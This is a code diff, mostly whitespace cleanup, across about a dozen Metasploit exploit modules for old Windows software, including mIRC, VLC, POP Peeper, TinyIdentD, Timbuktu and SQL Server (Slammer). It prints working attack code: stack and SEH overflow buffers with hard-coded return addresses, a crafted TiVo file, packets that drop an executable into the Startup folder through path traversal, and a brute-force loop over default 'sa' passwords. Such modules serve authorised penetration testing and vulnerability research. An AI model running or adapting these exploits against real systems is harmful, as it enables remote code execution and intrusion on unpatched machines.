--- a/modules/exploits/windows/misc/mirc_privmsg_server.rb +++ b/modules/exploits/windows/misc/mirc_privmsg_server.rb @@ -3,14 +3,12 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -21,16 +19,16 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'mIRC <= 6.34 PRIVMSG Handling Stack Overflow', 'Description' => %q{ - This module exploits a buffer overflow in the mIRC IRC Client v6.34 and earlier. - By enticing a mIRC user to connect to this server module, an excessively long PRIVMSG + This module exploits a buffer overflow in the mIRC IRC Client v6.34 and earlier. + By enticing a mIRC user to connect to this server module, an excessively long PRIVMSG command can be sent, overwriting the stack. Due to size restrictions, ordinal payloads may be necessary. This module is based on the code by SkD. }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2008-4449' ], [ 'OSVDB', '48752' ], [ 'BID', '31552' ], @@ -68,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote end def on_client_connect(client) - return if ((p = regenerate_payload(client)) == nil) + return if ((p = regenerate_payload(client)) == nil) print_status("Client connected! Sending payload...") buffer = ":my_irc_server.com 001 wow :Welcome to the #{datastore['SRVNAME']} wow\r\n" client.put(buffer) 
@@ -79,10 +77,10 @@ class Metasploit3 < Msf::Exploit::Remote sleep(2) sploit = ":" + Rex::Text.rand_text_alphanumeric(307) + [target['Rets'][0]].pack('V') + [target['Rets'][1]].pack('V') sploit << make_nops(4) + [target['Rets'][2]].pack('V') + make_nops(4) + "B" * 12 - sploit << Rex::Arch::X86.jmp_short(3) +Rex::Text.rand_text_alphanumeric(2) + sploit << Rex::Arch::X86.jmp_short(3) +Rex::Text.rand_text_alphanumeric(2) sploit << make_nops(4) + payload.encoded + make_nops(4) + " PRIVMSG wow : /FINGER wow\r\n" client.put(sploit) - + handler(client) service.close_client(client) end diff --git a/modules/exploits/windows/misc/ms07_064_sami.rb b/modules/exploits/windows/misc/ms07_064_sami.rb index de913f74a6..77751f2ea0 100644 --- a/modules/exploits/windows/misc/ms07_064_sami.rb +++ b/modules/exploits/windows/misc/ms07_064_sami.rb @@ -3,14 +3,12 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -22,18 +20,18 @@ class Metasploit3 < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack overflow in the DirectShow Synchronized Accessible Media Interchanged (SAMI) parser in quartz.dll. This module - has only been tested with Windows Media Player (6.4.09.1129) and + has only been tested with Windows Media Player (6.4.09.1129) and DirectX 8.0. }, 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2007-3901' ], [ 'OSVDB', '39126' ], [ 'MSB', 'MS07-064' ], - [ 'BID', '26787' ], + [ 'BID', '26787' ], ], 'DefaultOptions' => { 
@@ -48,27 +46,27 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows 2000 Pro SP4 English', { 'Offset' => 22412, 'Ret' => 0x75022ac4 } ], + [ 'Windows 2000 Pro SP4 English', { 'Offset' => 22412, 'Ret' => 0x75022ac4 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Dec 11 2007', 'DefaultTarget' => 0)) register_options( - [ + [ OptPort.new('SRVPORT', [ true, "The daemon port to listen on", 8080 ]) ], self.class) end def on_client_connect(client) - return if ((p = regenerate_payload(client)) == nil) + return if ((p = regenerate_payload(client)) == nil) client.get_once - buffer = make_nops(target['Offset'] - payload.encoded.length) + payload.encoded - buffer << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V') + buffer = make_nops(target['Offset'] - payload.encoded.length) + payload.encoded + buffer << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V') buffer << make_nops(10) + [0xe8, -485].pack('CV') + rand_text_english(132324) - + header = "HTTP/1.1 200 OK\r\n" header << "Content-Type: application/smil\r\n\r\n" @@ -83,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote body << "\"><P Class=\"ENUSCC\"></P></SYNC></BODY></SAMI>" sploit = header + body - + print_status("Sending #{sploit.length} bytes to #{client.peerhost}:#{client.peerport}...") client.put(sploit) diff --git a/modules/exploits/windows/misc/poppeeper_date.rb b/modules/exploits/windows/misc/poppeeper_date.rb index 137c8f4eaf..d6294cc631 100644 --- a/modules/exploits/windows/misc/poppeeper_date.rb +++ b/modules/exploits/windows/misc/poppeeper_date.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ 
@@ -16,17 +20,17 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'POP Peeper v3.4 DATE Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in POP Peeper v3.4. - When a specially crafted DATE string is sent to a client, - an attacker may be able to execute arbitrary code. This - module is based off of krakowlabs code. + When a specially crafted DATE string is sent to a client, + an attacker may be able to execute arbitrary code. This + module is based off of krakowlabs code. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2009-1029' ], - [ 'BID', '34093' ], + [ 'BID', '34093' ], [ 'URL', 'http://www.krakowlabs.com/res/adv/KL0209ADV-poppeeper_date-bof.txt' ], ], 'DefaultOptions' => @@ -51,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptPort.new('SRVPORT', [ true, "The POP daemon port to listen on", 110 ]) ], self.class) end @@ -68,21 +72,21 @@ class Metasploit3 < Msf::Exploit::Remote client.put(ok) client.get_once - + ok = "+OK\r\n" client.put(ok) - + client.get_once - + ok = "+OK 1 100\r\n" client.put(ok) - + client.get_once ok = "+OK\r\n1 " + rand_text_english(4) + "\r\n.\r\n" client.put(ok) - client.get_once + client.get_once ok = "+OK 1 100\r\n.\r\n" client.put(ok) @@ -94,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit = "Date: " + rand_text_alpha_upper(132) + generate_seh_payload(target.ret) + "\r\n.\r\n" client.put(sploit) - + handler service.close_client(client) end diff --git a/modules/exploits/windows/misc/poppeeper_uidl.rb b/modules/exploits/windows/misc/poppeeper_uidl.rb index 4d6b3d3d44..b039f7a0e4 100644 --- a/modules/exploits/windows/misc/poppeeper_uidl.rb +++ b/modules/exploits/windows/misc/poppeeper_uidl.rb 
@@ -27,9 +27,9 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => + 'References' => [ - [ 'BID', '33926' ], + [ 'BID', '33926' ], [ 'URL', 'http://www.krakowlabs.com/res/adv/KL0209ADV-poppeeper_uidl-bof.txt' ], ], 'DefaultOptions' => @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptPort.new('SRVPORT', [ true, "The POP daemon port to listen on", 110 ]) ], self.class) end @@ -71,21 +71,21 @@ class Metasploit3 < Msf::Exploit::Remote client.put(ok) client.get_once - + ok = "+OK\r\n" client.put(ok) - - client.get_once - - ok = "+OK 1 100\r\n" - client.put(ok) - + client.get_once - sploit = "+OK\r\n1 " + rand_text_alpha_upper(1072) + generate_seh_payload(target.ret) + "\r\n.\r\n" - + ok = "+OK 1 100\r\n" + client.put(ok) + + client.get_once + + sploit = "+OK\r\n1 " + rand_text_alpha_upper(1072) + generate_seh_payload(target.ret) + "\r\n.\r\n" + client.put(sploit) - + handler service.close_client(client) end diff --git a/modules/exploits/windows/misc/realtek_playlist.rb b/modules/exploits/windows/misc/realtek_playlist.rb index b93556a8cc..335dc2e8a9 100644 --- a/modules/exploits/windows/misc/realtek_playlist.rb +++ b/modules/exploits/windows/misc/realtek_playlist.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -17,14 +21,14 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Realtek Media Player Playlist Buffer Overflow.', 'Description' => %q{ - This module exploits a stack overflow in Realtek Media Player(RtlRack) A4.06. + This module exploits a stack overflow in Realtek Media Player(RtlRack) A4.06. When a Realtek Media Player client opens a specially crafted playlist, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2008-5664'], [ 'OSVDB', '50715'], @@ -44,7 +48,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Privileged' => false, 'DisclosureDate' => 'Dec 16 2008', 'DefaultTarget' => 0)) - end def autofilter @@ -56,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote end def on_request_uri(cli, request) - + return if ((p = regenerate_payload(cli)) == nil) pla = rand_text_alpha_upper(200) @@ -66,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, pla, { 'Content-Type' => 'text/plain' }) - + handler(cli) end diff --git a/modules/exploits/windows/misc/shixxnote_font.rb b/modules/exploits/windows/misc/shixxnote_font.rb index 9995656587..44a95c7c8b 100644 --- a/modules/exploits/windows/misc/shixxnote_font.rb +++ b/modules/exploits/windows/misc/shixxnote_font.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking 
@@ -23,15 +21,15 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'ShixxNOTE 6.net Font Field Overflow', 'Description' => %q{ - This module exploits a buffer overflow in ShixxNOTE 6.net. + This module exploits a buffer overflow in ShixxNOTE 6.net. The vulnerability is caused due to boundary errors in the handling of font fields. }, 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2004-1595'], ['OSVDB', '10721'], ['BID', '11409'], @@ -47,10 +45,10 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - + 'Targets' => [ - [ 'ShixxNOTE 6.net Universal', { 'Ret' => 0x10041951 } ], + [ 'ShixxNOTE 6.net Universal', { 'Ret' => 0x10041951 } ], ], 'Privileged' => false, @@ -59,10 +57,10 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) - register_options( - [ - Opt::RPORT(2000) - ], self.class) + register_options( + [ + Opt::RPORT(2000) + ], self.class) end @@ -74,15 +72,15 @@ class Metasploit3 < Msf::Exploit::Remote sploit = rand_text_alpha_upper(8, payload_badchars) sploit += "~~" sploit += rand_text_alpha_upper(118, payload_badchars) - + seh = generate_seh_payload(target.ret) - + sploit[112, seh.length] = seh sploit += rand_text_alpha_upper(200, payload_badchars) sploit += "~" * 10 sock.put(sploit) - + handler disconnect end diff --git a/modules/exploits/windows/misc/talkative_response.rb b/modules/exploits/windows/misc/talkative_response.rb index 54559e6345..0a5da3e875 100644 --- a/modules/exploits/windows/misc/talkative_response.rb +++ b/modules/exploits/windows/misc/talkative_response.rb 
@@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ @@ -20,13 +20,13 @@ class Metasploit3 < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack overflow in Talkative IRC v0.4.4.16. When a specially crafted response string is sent to a client, - an attacker may be able to execute arbitrary code. + an attacker may be able to execute arbitrary code. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'BID', '34141' ], [ 'URL', 'http://milw0rm.com/exploits/8227' ], ], @@ -52,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptPort.new('SRVPORT', [ true, "The IRC daemon port to listen on", 6667 ]) ], self.class) end @@ -66,12 +66,12 @@ class Metasploit3 < Msf::Exploit::Remote return if ((p = regenerate_payload(client)) == nil) sploit = ":" + rand_text_alpha_upper(272) + Rex::Arch::X86.jmp_short(6) - sploit << rand_text_alpha_upper(2) + [target.ret].pack('V') + payload.encoded + sploit << rand_text_alpha_upper(2) + [target.ret].pack('V') + payload.encoded sploit << " PRIVMSG " + rand_text_alpha(rand(10) + 1) sploit << " : /FINGER " + rand_text_alpha(rand(10) + 1) + ".\r\n" - + client.put(sploit) - + handler service.close_client(client) end diff --git a/modules/exploits/windows/misc/tiny_identd_overflow.rb b/modules/exploits/windows/misc/tiny_identd_overflow.rb index f5db1f3713..e3c291515f 100644 --- a/modules/exploits/windows/misc/tiny_identd_overflow.rb +++ b/modules/exploits/windows/misc/tiny_identd_overflow.rb 
@@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -22,13 +20,13 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'TinyIdentD 2.2 Stack Overflow', 'Description' => %q{ - This module exploits a stack based buffer overflow in TinyIdentD version 2.2. + This module exploits a stack based buffer overflow in TinyIdentD version 2.2. If we send a long string to the ident service we can overwrite the return - address and execute arbitrary code. Credit to Maarten Boone. + address and execute arbitrary code. Credit to Maarten Boone. }, 'Author' => 'Jacopo Cervini <acaro[at]jervus.it>', 'Version' => '$Revision$', - 'References' => + 'References' => [ ['CVE', '2007-2711'], ['OSVDB', '36053'], @@ -42,16 +40,15 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - ['Windows 2000 Server SP4 English', { 'Ret' => 0x7c2d15e7, } ], # call esi - ['Windows XP SP2 Italian', { 'Ret' => 0x77f46eda, } ], # call esi - - ], + ['Windows 2000 Server SP4 English', { 'Ret' => 0x7c2d15e7, } ], # call esi + ['Windows XP SP2 Italian', { 'Ret' => 0x77f46eda, } ], # call esi + ], 'Privileged' => false, 'DisclosureDate' => 'May 14 2007' )) - register_options([ Opt::RPORT(113) ], self.class) + register_options([ Opt::RPORT(113) ], self.class) end def exploit 
@@ -61,14 +58,14 @@ class Metasploit3 < Msf::Exploit::Remote pattern << make_nops(0x1eb - payload.encoded.length) pattern << payload.encoded pattern << [ target.ret ].pack('V') - + request = pattern + "\n" print_status("Trying #{target.name} using address at #{"0x%.8x" % target.ret }...") sock.put(request) - + handler disconnect diff --git a/modules/exploits/windows/misc/videolan_tivo.rb b/modules/exploits/windows/misc/videolan_tivo.rb index e40fea0387..88f0f8cdea 100644 --- a/modules/exploits/windows/misc/videolan_tivo.rb +++ b/modules/exploits/windows/misc/videolan_tivo.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -16,14 +20,14 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'VideoLAN VLC TiVo Buffer Overflow', 'Description' => %q{ - This module exploits a buffer overflow in VideoLAN VLC 0.9.4. - By creating a malicious TY file, a remote attacker could overflow a - buffer and execute arbitrary code. + This module exploits a buffer overflow in VideoLAN VLC 0.9.4. + By creating a malicious TY file, a remote attacker could overflow a + buffer and execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2008-4654' ], [ 'OSVDB', '49181' ], @@ -44,7 +48,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Privileged' => false, 'DisclosureDate' => 'Oct 22 2008', 'DefaultTarget' => 0)) - end def autofilter 
@@ -56,36 +59,36 @@ class Metasploit3 < Msf::Exploit::Remote end def on_request_uri(cli, request) - + return if ((p = regenerate_payload(cli)) == nil) - ty = "\xF5\x46\x7A\xBD" - ty << "\x00\x00\x00\x02" - ty << "\x00\x02\x00\x00" - ty << "\x00\x00\x00\x00" + ty = "\xF5\x46\x7A\xBD" + ty << "\x00\x00\x00\x02" + ty << "\x00\x02\x00\x00" ty << "\x00\x00\x00\x00" - ty << "\x00\x00\x05\x41" - ty << "\x00\x00\x00\x00" - ty << "\x00\x00\x05\x49" - ty << "\x00" * 60 + ty << "\x00\x00\x00\x00" + ty << "\x00\x00\x05\x41" + ty << "\x00\x00\x00\x00" + ty << "\x00\x00\x05\x49" + ty << "\x00" * 60 ty << "\x00" * (1024 - payload.encoded.length) + payload.encoded ty << make_nops(2) + Rex::Arch::X86.jmp_short(6) + [target.ret].pack('V') ty << make_nops(12) + [0xe8, -525].pack('CV') + "\x00" * (129931) - ty << "\x05" - ty << "\x00\x00\x00" - ty << "\x05" - ty << "\x00" - ty << "\x09" - ty << "\xc0" - ty << "\x00" * 14 - ty << "\x06" - ty << "\xe0" - ty << "\x00" * 302004 + ty << "\x05" + ty << "\x00\x00\x00" + ty << "\x05" + ty << "\x00" + ty << "\x09" + ty << "\xc0" + ty << "\x00" * 14 + ty << "\x06" + ty << "\xe0" + ty << "\x00" * 302004 print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, ty, { 'Content-Type' => 'application/octet-stream' }) - + handler(cli) end diff --git a/modules/exploits/windows/misc/windows_rsh.rb b/modules/exploits/windows/misc/windows_rsh.rb index 62567273b2..d6f905bacb 100644 --- a/modules/exploits/windows/misc/windows_rsh.rb +++ b/modules/exploits/windows/misc/windows_rsh.rb 
@@ -11,27 +11,25 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp - def initialize(info = {}) super(update_info(info, 'Name' => 'Windows RSH daemon Buffer Overflow', 'Description' => %q{ - This module exploits a vulnerabliltiy in Windows RSH daemon 1.8. + This module exploits a vulnerabliltiy in Windows RSH daemon 1.8. The vulnerability is due to a failure to check for the length of input sent to the RSH server. A CPORT of 512 -> 1023 must be configured for the exploit - to be successful. + to be successful. }, 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2007-4006'], ['OSVDB', '38572'], ['BID', '25044'], @@ -58,8 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Jul 24 2007', 'DefaultTarget' => 0)) - register_options([Opt::RPORT(514)], self.class) - + register_options([Opt::RPORT(514)], self.class) end def exploit @@ -67,12 +64,12 @@ class Metasploit3 < Msf::Exploit::Remote sploit = (("\x00" + rand_text_english(1)) * 2) + "\x00" sploit << rand_text_english(1024) + [target.ret].pack('V') - sploit << payload.encoded - + sploit << payload.encoded + print_status("Trying target #{target.name}...") sock.put(sploit) - + handler disconnect end diff --git a/modules/exploits/windows/motorola/timbuktu_fileupload.rb b/modules/exploits/windows/motorola/timbuktu_fileupload.rb index a6e1c4511f..51d52e68bb 100644 --- a/modules/exploits/windows/motorola/timbuktu_fileupload.rb +++ b/modules/exploits/windows/motorola/timbuktu_fileupload.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ 
@@ -20,10 +24,10 @@ class Metasploit3 < Msf::Exploit::Remote Timbuktu Pro for Windows 8.6.5. }, 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, + 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2008-1117' ], [ 'OSVDB', '43544' ], ], @@ -46,12 +50,11 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'May 10 2008')) - register_options( - [ - Opt::RPORT(407), - OptString.new('PATH', [ true, 'The path to place the executable.', '\\../../../Documents and Settings/All Users/Start Menu/Programs/Startup/']), - ], self.class) - + register_options( + [ + Opt::RPORT(407), + OptString.new('PATH', [ true, 'The path to place the executable.', '\\../../../Documents and Settings/All Users/Start Menu/Programs/Startup/']), + ], self.class) end def exploit 
@@ -60,54 +63,54 @@ class Metasploit3 < Msf::Exploit::Remote exe = rand_text_alpha(8) + ".exe" data = Msf::Util::EXE.to_win32pe(framework, payload.encoded) - pkt1 = "\x00\x01\x6B\x00\x00\xB0\x00\x23\x07\x22\x03\x07\xD6\x69\x6D\x3B" - pkt1 << "\x27\xA8\xD0\xF2\xD6\x69\x6D\x3B\x27\xA8\xD0\xF2\x00\x09\x01\x41" - pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - pkt1 << "\x00\x00\x00\x00\x00\x00\x01\x97\x01\x41\x00\x00\x00\x00\x00\x00" - pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x04\xB7\x1D" - pkt1 << "\xBF\x42\x00\x00\x00\x00\x7F\x00\x00\x01\x00\x00\x00\x00\x00\x00" - pkt1 << "\x00\x00\x00\x00\x00\x00" + pkt1 = "\x00\x01\x6B\x00\x00\xB0\x00\x23\x07\x22\x03\x07\xD6\x69\x6D\x3B" + pkt1 << "\x27\xA8\xD0\xF2\xD6\x69\x6D\x3B\x27\xA8\xD0\xF2\x00\x09\x01\x41" + pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + pkt1 << "\x00\x00\x00\x00\x00\x00\x01\x97\x01\x41\x00\x00\x00\x00\x00\x00" + pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x04\xB7\x1D" + pkt1 << "\xBF\x42\x00\x00\x00\x00\x7F\x00\x00\x01\x00\x00\x00\x00\x00\x00" + pkt1 << "\x00\x00\x00\x00\x00\x00" - pkt3 = "\xFB\x00\x00\x00\x00\x54\x45\x58\x54\x74\x74\x78\x74\xC2\x32\x94" - 
pkt3 << "\xCC\xC2\x32\x94\xD9\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00" - pkt3 << "\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - pkt3 << "\x00\x00\x00\x00\x00\x00\x00" - pkt3 << [datastore['PATH'].length + exe.length].pack('C') + datastore['PATH'] + exe + pkt3 = "\xFB\x00\x00\x00\x00\x54\x45\x58\x54\x74\x74\x78\x74\xC2\x32\x94" + pkt3 << "\xCC\xC2\x32\x94\xD9\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00" + pkt3 << "\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + pkt3 << "\x00\x00\x00\x00\x00\x00\x00" + pkt3 << [datastore['PATH'].length + exe.length].pack('C') + datastore['PATH'] + exe + + print_status("Connecting to #{rhost} on port #{rport}...") - print_status("Connecting to #{rhost} on port #{rport}...") - sock.put(pkt1) - sleep(0.15) + sleep(0.15) - sock.put("\xFF") - sleep(0.15) + sock.put("\xFF") + sleep(0.15) - sock.put(pkt3) - sleep(0.15) + sock.put(pkt3) + sleep(0.15) - sock.put("\xF9\x00") - sleep(0.15) + sock.put("\xF9\x00") + sleep(0.15) - print_status("Sending EXE payload '#{exe}' to #{rhost}:#{rport}...") - sock.put("\xF8" + [data.length].pack('n') + data) - sleep(5) + print_status("Sending EXE payload '#{exe}' to #{rhost}:#{rport}...") + sock.put("\xF8" + [data.length].pack('n') + data) + sleep(5) - sock.put("\xF7") - sleep(0.15) + sock.put("\xF7") + sleep(0.15) - sock.put("\xFA") - sleep(0.15) + sock.put("\xFA") + sleep(0.15) - sock.put("\xFE") - sleep(0.08) + sock.put("\xFE") + sleep(0.08) + + print_status("Done!") + disconnect - print_status("Done!") - disconnect - end end diff --git a/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb b/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb index f571954913..194a337851 100644 --- a/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb +++ b/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb 
@@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote [ [ 'Automatic', { } ], ], - 'DefaultTarget' => 0 + 'DefaultTarget' => 0 )) end @@ -50,34 +50,34 @@ class Metasploit3 < Msf::Exploit::Remote # New installations use a randomly generated suffix like "lyris629dAe536F" pass = nil - + while(true) - print_status("Trying to authenticate with password 'lminstall'...") + print_status("Trying to authenticate with password 'lminstall'...") if(mssql_login('sa', 'lminstall')) pass = 'lminstall' break end - + print_status("Trying to authenticate with passwords 'lyris1' to 'lyris65535'...") 1.upto(65535) do |pid| - + if(pid % 1000 == 0) print_status(" >> Completed #{pid} of 65535 authentication requests") end - + if(mssql_login('sa', "lyris#{pid}")) pass = "lyris#{pid}" break - end + end end print_status("This system does not appear to be exploitable") return - end - + end + print_status("") print_status("Sucessfully authenticated to #{rhost}:#{rport} with user 'sa' and password '#{pass}'") print_status("") - + mssql_upload_exec(Msf::Util::EXE.to_win32pe(framework,payload.encoded)) handler diff --git a/modules/exploits/windows/mssql/ms02_039_slammer.rb b/modules/exploits/windows/mssql/ms02_039_slammer.rb index 1f57dacd57..7785f09272 100644 --- a/modules/exploits/windows/mssql/ms02_039_slammer.rb +++ b/modules/exploits/windows/mssql/ms02_039_slammer.rb 
@@ -3,32 +3,30 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::MSSQL - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft SQL Server Resolution Overflow', 'Description' => %q{ - This is an exploit for the SQL Server 2000 resolution + This is an exploit for the SQL Server 2000 resolution service buffer overflow. This overflow is triggered by sending a udp packet to port 1434 which starts with 0x04 and is followed by long string terminating with a colon and a number. This module should work against any vulnerable SQL Server 2000 or MSDE install (pre-SP3). - + }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, @@ -48,9 +46,9 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00\x3a\x0a\x0d\x2f\x5c", 'StackAdjustment' => -3500, }, - 'Targets' => + 'Targets' => [ - [ + [ 'MSSQL 2000 / MSDE <= SP2', { 'Platform' => 'win', @@ -61,14 +59,14 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'DisclosureDate' => 'Jul 24 2002', 'DefaultTarget' => 0)) - - register_options( - [ - Opt::RPORT(1434) - ], self.class) + + register_options( + [ + Opt::RPORT(1434) + ], self.class) end - - + + def check info = mssql_ping if (info['ServerName']) 
